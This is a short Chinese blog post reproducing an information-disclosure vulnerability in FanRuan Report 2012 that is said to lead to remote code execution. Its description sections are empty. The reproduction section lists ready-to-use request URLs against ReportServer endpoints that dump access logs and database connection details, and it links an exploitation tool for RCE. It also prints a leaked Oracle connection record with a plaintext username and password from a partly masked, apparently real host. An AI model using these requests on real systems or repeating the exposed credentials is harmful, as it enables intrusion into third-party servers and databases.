0
点赞
收藏
分享

微信扫一扫

帆软报表 2012 信息泄露漏洞导致RCE

其生 2022-04-25 阅读 102
安全

漏洞描述

漏洞影响

空间测绘

漏洞复现

  • 访问ip日志EXP
http://xxx.xxx.xxx.xxx/ReportServer?op=fr_server&cmd=sc_visitstatehtml&showtoolbar=false

  • ✅ 数据库信息泄露
http://xxx.xxx.xxx.xxx/ReportServer?op=fr_server&cmd=sc_getconnectioninfo

  • ✅ 数据库利用工具RCE
https://github.com/safe6Sec/PentestDB

数据库信息:
{"connection":[{"name":"sdykdx","driver":"oracle.jdbc.driver.OracleDriver","password":"sdykdx","user":"sdykdx","url":"jdbc:oracle:thin:@202.204.xxx.117:1521:orcl"}],"fr_platform_version":1650895353052}

举报

相关推荐

帆软报表-js脚本-控制

javascript

帆软报表修改日志级别

帆软Java后端开发指尖人生

帆软报表 V8 get_geo_json 任意文件读取漏洞

安全AES算法AES加密算法

帆软报表导出各种格式之后台导出

java开发语言帆软报表后台导出

开发日志:OpenSSL 信息泄露漏洞

分布式

rce 漏洞

linux服务器运维

Microsoft Windows SMB信息泄露漏洞

microsoftwindows

Pikachu漏洞靶场 敏感信息泄露

web安全安全漏洞靶场敏感信息泄露

由ctfhub信息泄露题型对常见信息泄露漏洞总结

vimweb安全安全

【漏洞复现】Apache OFBiz 路径遍历导致RCE漏洞(CVE-2024-36104)

java-rabbitmqspring bootrabbitmq
0 条评论